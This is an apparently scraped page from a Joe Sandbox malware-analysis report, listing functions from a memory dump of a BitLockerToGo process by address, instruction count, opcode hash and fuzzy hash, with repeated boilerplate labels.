Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace2e2f534e3077a73259f78d304c5ab66839ee92efd14bfaafac8d2806c97f5
Instruction ID: 260f6fd262c0645c7ea8341563849b1ac5a298248aae6f62721cb14925d11b55
Opcode Fuzzy Hash: ace2e2f534e3077a73259f78d304c5ab66839ee92efd14bfaafac8d2806c97f5
Instruction Fuzzy Hash: ED1154B3E26D70078344897D8D05256AAD65BD5B30F1E8729AEF4DB2E0C6748C1546D1

Function 0044CE0F Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b260322d4690d737f684dc552797be47db83572cc7bc7cadcf68f0ef2c409d4
Instruction ID: 735a63795049c2275f8c7b9d68ffea849d975800273d428a8778baaa74ab94d0
Opcode Fuzzy Hash: 8b260322d4690d737f684dc552797be47db83572cc7bc7cadcf68f0ef2c409d4
Instruction Fuzzy Hash: 3E1116B09012458BEB61CF98C990A7FFBF5EB0A705F64085DE891E7742D339AD04CB69

Function 0043EEA0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7451ddb77fa8f2499d8fe72e53ac00d0989483cdc87f499038c92d8123bb77c
Instruction ID: bfd773c4e6bba64f712a6ab3063501f3731be206a767cd890af40d0e84fca133
Opcode Fuzzy Hash: e7451ddb77fa8f2499d8fe72e53ac00d0989483cdc87f499038c92d8123bb77c
Instruction Fuzzy Hash: E3119373E259201BC75CD93DCC2216B7AD28BD5230B2EC72EB9B6C72E4E53888010690

Function 0040CFE0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1db8516d27097cece9147e623bf785a8a446f1a8261c36fe6b4d1db5b4f9e399
Instruction ID: 2420fc171dab65f1d5ab5b1106c5f31413b6dc6639335e43db47e75738a2af97
Opcode Fuzzy Hash: 1db8516d27097cece9147e623bf785a8a446f1a8261c36fe6b4d1db5b4f9e399
Instruction Fuzzy Hash: 1C11F173926D600B8358CD7D8C51167BAD29F96730B2A872D7EB6DB2E0C7248D104689

Function 00423510 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649ebefb9e143ab0a8b95adf554069beaa6417784fdba539e2313f1f16dc3dc7
Instruction ID: caa54e26bd8ae051a34b21c4ab1589e9d50f1fa48dee943694794986e26a5553
Opcode Fuzzy Hash: 649ebefb9e143ab0a8b95adf554069beaa6417784fdba539e2313f1f16dc3dc7
Instruction Fuzzy Hash: 70113373E6492107C358CD3C8D1626A7AD14B86330F29873D7DB9D73E4D22CCD514685

Function 0042DA40 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d68b53ee38d363a58cdb1e742d52c152676ec75470301895cfb00e8d18df8f8
Instruction ID: 47b1184c8752f061db5e18b1ec5e6719ab8c0413cd58f1a6fd5931c85e16c36f
Opcode Fuzzy Hash: 4d68b53ee38d363a58cdb1e742d52c152676ec75470301895cfb00e8d18df8f8
Instruction Fuzzy Hash: 4E11BE739A5A501B9300EE7E8C40067BAD79FC6774F2E872DBAB8C72E0C63488124752

Function 0042E1F0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0ad9e99036c00cc2876886ca89acddf99836f68f748015cc9ca549e427638a
Instruction ID: dc9bc423df821ee63db880a0719dc71bbaca4eca386a50d745cbb04261e840de
Opcode Fuzzy Hash: 5d0ad9e99036c00cc2876886ca89acddf99836f68f748015cc9ca549e427638a
Instruction Fuzzy Hash: B7118C73F295214B831CCD3D8D1516BEAD35AD8230B1AC73EACFAD72E8D97488068280

Function 0041C520 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e60a91c34628941e5e1208075bcc002dbccfb7ce34d0b7ffbdcb809eb0e9357
Instruction ID: d5a10a5cf0af096ac29368f167db9fd1894f6c508c87cea2b7dc37563844b2e3
Opcode Fuzzy Hash: 8e60a91c34628941e5e1208075bcc002dbccfb7ce34d0b7ffbdcb809eb0e9357
Instruction Fuzzy Hash: CA1190B3E159210B870CC97CCC2122ABAD25BD5330B19C33DADB6D77E9D628CD4086C9

Function 0043E640 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b366c75091ed553cc766747feee1e8a7f6a527380095715cb395b27026e3b99
Instruction ID: f8b54b66aec01fda06ae1c1a08634897ff84f97fbcb54250986a4b0099fd19e8
Opcode Fuzzy Hash: 6b366c75091ed553cc766747feee1e8a7f6a527380095715cb395b27026e3b99
Instruction Fuzzy Hash: 73119473A28A610B974CDD3D9C2113BBAD35BC6270B19CB3D69B6DB3E5D678C8114241

Function 0044BA60 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 900536c96d3124dfa023b38ec3040bbff91e9ba56df7315cc0d992230ab98f89
Instruction ID: b64737aa62ae0829341df46118d6f64cee12490fac3bfd59ecb370faa3d59846
Opcode Fuzzy Hash: 900536c96d3124dfa023b38ec3040bbff91e9ba56df7315cc0d992230ab98f89
Instruction Fuzzy Hash: EC11E6B3E1AD200B9308CD3DCC061566ED35BD5330B1E832EADB5D73D4E5789C524681

Function 0043E220 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 6638e1363b54a0b2ce053fdbbdb7273149298712ba37cd0aec8f03005fb32e20
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 5A112933A061D40EC3228D3D8400966BFA70ADB734F1D93DAF4B49B2D2D6268D8A9359

Function 0043E320 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd293699487bd5e1daf55c4724c7b9714cf540ba9f8d91891fc9c03cb252d13f
Instruction ID: 23b0257529563f9b3513f21091e67334b635eb30694fb3c472eacab678b872f9
Opcode Fuzzy Hash: dd293699487bd5e1daf55c4724c7b9714cf540ba9f8d91891fc9c03cb252d13f
Instruction Fuzzy Hash: 43112E73B159610B8358DD7D8C52127BAD2ABC6330B2AC73EBDB6D73E0D6388D114681

Function 00412840 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f0436b6a0511fa4b09c32f08e760e8934e231f697192cd03adac0ad5df7d03
Instruction ID: f4bc18db094ad08737277d7752c13b1014580a980429eccfe3a7004a2ab395af
Opcode Fuzzy Hash: 62f0436b6a0511fa4b09c32f08e760e8934e231f697192cd03adac0ad5df7d03
Instruction Fuzzy Hash: 2E118C73A259300B8318CD3D8C0611ABAD29BC6730B2A873DBDF9E73E8DA24CD014381

Function 0044A1D0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b106b2dedd1324692d33b6525744326e6ad719188403960b8c3b23b0f55ddc0c
Instruction ID: 513b7f3c69c0ce82474d6f555ff9e9acfda6270c3076d8565dbe437d44d82010
Opcode Fuzzy Hash: b106b2dedd1324692d33b6525744326e6ad719188403960b8c3b23b0f55ddc0c
Instruction Fuzzy Hash: 3D119A73D1A9610B9318DD3E8C00117BE935BC2730B2AC7697DF8CB2F8CA30C9068289

Function 00433430 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b016eeec1e91cbc6bc13d7c8ddc968b9e1d51a71e8699b1b7810fc68c6f997
Instruction ID: ead3cd4a6fa46ef4d1335dd948f0d7cc81f5d00dc720ce4868b6aa01d8faefb1
Opcode Fuzzy Hash: 31b016eeec1e91cbc6bc13d7c8ddc968b9e1d51a71e8699b1b7810fc68c6f997
Instruction Fuzzy Hash: A501F1F560030087D721AF51D4D073BB2A86FA870DF18513EE80557342EB3DED048299

Function 0043FD80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f8833660cf7c65f29022ad5cd5bbbd4826494f74a9707e493f52ecd97572a7
Instruction ID: b2fa8e108355da2417bbfd881c405b0aa8cfe9104e2b763718e6ab5a5fc96b7d
Opcode Fuzzy Hash: 82f8833660cf7c65f29022ad5cd5bbbd4826494f74a9707e493f52ecd97572a7
Instruction Fuzzy Hash: 4611E677E25A214B8348CA3C8C121677DD25BC5330B29CB2DB9BAD73E8D6BCD9014380

Function 00411FF0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e005da9c2f492ce10f292d364176620442c870eef328cd351f65d80f91b24677
Instruction ID: 1a6522ed182f05b1fd6ed3a9b2864568c9f76ee181bfbd98b26a66573125eaec
Opcode Fuzzy Hash: e005da9c2f492ce10f292d364176620442c870eef328cd351f65d80f91b24677
Instruction Fuzzy Hash: 0D110673A289110BD30CDD3E8C123677A939BC6730F29CB3DB9B5C62E8D678C9164285

Function 004463D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2b550b5ef743737bf24c379bb1b92a1c7430c8d33a9e36924df3645bf4de2df
Instruction ID: 40a2455f49b5dbeeea25e98d87f7cfe133ebf7d89ebf625ed76a199713350bad
Opcode Fuzzy Hash: d2b550b5ef743737bf24c379bb1b92a1c7430c8d33a9e36924df3645bf4de2df
Instruction Fuzzy Hash: D7114273E19961078318CD3DCC0215BBAD39BD5631B29C779BDB5D73E8D634880146A1

Function 0040F5D2 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f052dc0ff531fa4491574ab9a4839393c2ec26680b1de9e38c7f6492b7cb4d0f
Instruction ID: b9dbeb40057769f0a5e7e19dcdd17679631724cc6f6d77bb781c631745d667c6
Opcode Fuzzy Hash: f052dc0ff531fa4491574ab9a4839393c2ec26680b1de9e38c7f6492b7cb4d0f
Instruction Fuzzy Hash: 3E119031D18214ABCB1ACF94E8D07ADB3F6AF09340F144439D801F73A1DBB9A845CB58

Function 0042D980 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde1b0ffa25f4f377b46a58313900eeac4202894ffb41f83f8183cf70b80f528
Instruction ID: e79e66cafc431f47a2f092840b92ed4622aa11a45529ac9ca4bd5cf3ec88bdff
Opcode Fuzzy Hash: cde1b0ffa25f4f377b46a58313900eeac4202894ffb41f83f8183cf70b80f528
Instruction Fuzzy Hash: 63113673E169714B8314DD7D8C0015ABED39BC6331B2AC769ACF8E72E9EA748D014685

Function 0043FCC0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 366eeab964ce9e75f4a0d54cdb28db4697e1fed9b650b125867a6fdb9a5df451
Instruction ID: e4757ef240084f4d7d00ea464d82634a6c2d52faaae011eeacc47913c6a327aa
Opcode Fuzzy Hash: 366eeab964ce9e75f4a0d54cdb28db4697e1fed9b650b125867a6fdb9a5df451
Instruction Fuzzy Hash: 27113A73D169200B8348DD7D8C1116BBED25BC6730F6A8B39BDFADB2E0D62489124285

Function 00446DE0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64ceb5e8b95999c06af5f3302e50633e0a9530b8d06d89dab9bf933ed548cdb
Instruction ID: 3e7c3f937498ec529f34e271ac69b684efc07bf7fe7c2cedeb26ac0abe694592
Opcode Fuzzy Hash: e64ceb5e8b95999c06af5f3302e50633e0a9530b8d06d89dab9bf933ed548cdb
Instruction Fuzzy Hash: 09115A33E159204B9368D93E8C02147BAD35BC5630B2AC77AACB8D72E8DA748C028685

Function 00423F00 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e8dc3ee2193e8c21730aac37a532a39750d554f1896c1c85fb1efff951c3be
Instruction ID: d87da0d12b58ec56abde3a286fb014f5f3f4d7f363820d5f6a5f899132b10900
Opcode Fuzzy Hash: 31e8dc3ee2193e8c21730aac37a532a39750d554f1896c1c85fb1efff951c3be
Instruction Fuzzy Hash: 2D11F873E2A9310B9348CD7C9C11267BA925B86730F2A877D7DF5E72E0D6288D104689

Function 00423FC0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06579ec092a20200a989f7d8b151f82d550f194f00c4decc5ade775f38f7cc2
Instruction ID: 49eb353a02b7c0b2fe36b6e87069d90721435a0b05ddefcea7bea227a3ef03dc
Opcode Fuzzy Hash: d06579ec092a20200a989f7d8b151f82d550f194f00c4decc5ade775f38f7cc2
Instruction Fuzzy Hash: BA114C73A195120BC34CCE3D8C2272AAA928BC5231F1AC72DBDF6C62E4D668C8018695

Function 00423CA0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 319a0e205ccdd12dd9e0ba7aa94c8a0e958200eb40218ef4064f44fe1b8af006
Instruction ID: 880d827f2b51485477085c0250cda13fac4fe62eb0bc495824ae02110613cf6d
Opcode Fuzzy Hash: 319a0e205ccdd12dd9e0ba7aa94c8a0e958200eb40218ef4064f44fe1b8af006
Instruction Fuzzy Hash: 62114873E269310B9218CD3D8C11116AAD29BC6770B2A877AACF4E73E4D6748C0186C5

Function 00434F10 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79cd902430c5471ffe360da4df7837cdc8aace6766c65ec5d7efd30ddd09fe8
Instruction ID: 626e367fc6f34b6f912612ddb9beeb6221ed2a1f2630ca20f380f15fcc21d8b8
Opcode Fuzzy Hash: f79cd902430c5471ffe360da4df7837cdc8aace6766c65ec5d7efd30ddd09fe8
Instruction Fuzzy Hash: EC115A73E1A9610B9358CD7E8C01166BED35BC6730B2AC72DBCB4D72E8DA788D124685

Function 0041C680 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5db81b23b6e80fdfcb0102b96c150c239508adda78238ee4d7e5d4235ed2477
Instruction ID: 8949043bfbfa0c46aa1ddefa4567939c1c31053920f113029f7df488ba012f07
Opcode Fuzzy Hash: f5db81b23b6e80fdfcb0102b96c150c239508adda78238ee4d7e5d4235ed2477
Instruction Fuzzy Hash: 0D118277B28A2107870CCD3CDD2516B7AD25B95230B09CB3D75B6C73E4E668CC404685

Function 0041C7E0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a159348800209029441e6053769fc55b0030b5cd62da0d7cc3493a159df44e
Instruction ID: 73708c1189514c660c5f93b207f497cca4a4b16e325b4fc760c94fe7e43077c8
Opcode Fuzzy Hash: b8a159348800209029441e6053769fc55b0030b5cd62da0d7cc3493a159df44e
Instruction Fuzzy Hash: 76111CB3E25D214BC348CD3CDC223667ED25F92730F298B2D7AB6D72E4D628C9214655

Function 0042AE20 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710b280f0087bd370d24cb4ab93363b95601850ea8bdd4e3795c0c5e6868d819
Instruction ID: 3e0630840da6183152da8b356b2c95f41ef4856df706a40a8dbc336c73bbcfc1
Opcode Fuzzy Hash: 710b280f0087bd370d24cb4ab93363b95601850ea8bdd4e3795c0c5e6868d819
Instruction Fuzzy Hash: E5110973E299310B8358CD7D8C02256BAD29BC6730B2AC779BDB4E73E0D268CD114685

Function 00425080 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6708af98148cafd27e20cc2c4a68156caca51dce140dae667413030c6e442955
Instruction ID: 7b0a0576b4065b5e08ccb8eeb1df6d4b158c23e4fffc36af0fc4aa118ba3b66e
Opcode Fuzzy Hash: 6708af98148cafd27e20cc2c4a68156caca51dce140dae667413030c6e442955
Instruction Fuzzy Hash: 3711AC73B189110BC708CD3D8C1126ABAD3AFD1631F2CC72DB6B6C77D8CA3488224251

Function 00424340 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34eca7b55cbe9f013b75a08442b7b1b2696ca893683fabb04d8b981cc2a5e99c
Instruction ID: 8f36cc013f6889625354b33a2e6d8527c1f8570135470478ebca5087011c309e
Opcode Fuzzy Hash: 34eca7b55cbe9f013b75a08442b7b1b2696ca893683fabb04d8b981cc2a5e99c
Instruction Fuzzy Hash: FA11A173E25A110BC348CD3D8C16227BED25FD5370F2A872EB9B6C72E4DA74D5028656

Function 0040E640 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a723494d9ead1eb0d4fbb216c7f91655cd30c8ae8e222f07e256b70ddf5a24
Instruction ID: 6220495a37d8398bc22254f66ab7e4bfcbcc37ed3abf257f4cbcb8ac3bc5831f
Opcode Fuzzy Hash: 58a723494d9ead1eb0d4fbb216c7f91655cd30c8ae8e222f07e256b70ddf5a24
Instruction Fuzzy Hash: 72119EB7E2992107D308893DCC1265ABA926BE5730F1D8B6DAAB5DB2E4D634C8114281

Function 0041D810 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a35eb1c04ac81eefedec2a17acf844a1c79f040485689d54f1b5ef38ba0252d8
Instruction ID: ed47cfd9737dfa3fa1dc2a8d2cce18f71d25fcaaa87244b1d90ca08e4c8a634b
Opcode Fuzzy Hash: a35eb1c04ac81eefedec2a17acf844a1c79f040485689d54f1b5ef38ba0252d8
Instruction Fuzzy Hash: D6113AB3E259200B8348CD3D9C51266BA931F96730B2DCB29B9B9DB2E4D664D9214281

Function 004248C0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c4aea0f231068f024d386ea7172b9026baf5c4f62aabeff01e22af4c07c458
Instruction ID: a51aa3d33c723029267dbd92f4d313f042789404684baa08f540e95d1955585c
Opcode Fuzzy Hash: 05c4aea0f231068f024d386ea7172b9026baf5c4f62aabeff01e22af4c07c458
Instruction Fuzzy Hash: 0C118EB3A159A10B8318CD7D8C51157BAE36BC5234B2EC72ABDF8D73D4EA78CD124681

Function 0040E330 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8050efb7cb1fa0052207cc66e0ff546cb1319473c3ba0f6ebb9e4f03c2ed67b
Instruction ID: dd70dc5dd6fd93430f63274c3a0424a3d1fdaf721c34ede164d44ba305635591
Opcode Fuzzy Hash: e8050efb7cb1fa0052207cc66e0ff546cb1319473c3ba0f6ebb9e4f03c2ed67b
Instruction Fuzzy Hash: 191161B3F299210B870CCD3D9C2116BBAD24BD9230B19C73DBAB6C73D4D638C8428695

Function 0041C980 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db937e5b39f3d26239cff9aa576d69104c2e93623ac8fa3159eb875adf85c20
Instruction ID: c2631d6eed84e23a79f640cd4268f95be1317080d814175f5b7e801516a1a8ff
Opcode Fuzzy Hash: 8db937e5b39f3d26239cff9aa576d69104c2e93623ac8fa3159eb875adf85c20
Instruction Fuzzy Hash: 61118EB3A19A214B8398CD3DCC12667BAD35BD5770F19C72EB9B5C72E8DA34C8128245

Function 00446660 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105f40e0fda37ec4e75416b7aac32ccf8ab65b5061793afa606e706d113fa117
Instruction ID: adca1ddf0b1b7c7169af16bff4b7fa3d233b11589b04c0b6e51995f5c5b8b6ec
Opcode Fuzzy Hash: 105f40e0fda37ec4e75416b7aac32ccf8ab65b5061793afa606e706d113fa117
Instruction Fuzzy Hash: F4111E73D1A9210BD358CD3E8C01257BAD35BC5330F2AC77DADB8D72E8CA7488124695

Function 0040E5A0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0f3d2b183563610966c50934ddef5f415b2464633e576ef3d032d980e4f42d1
Instruction ID: ad4757e8526afe0d955404095fb8faee2d25c29578536219a23d982f7ec34562
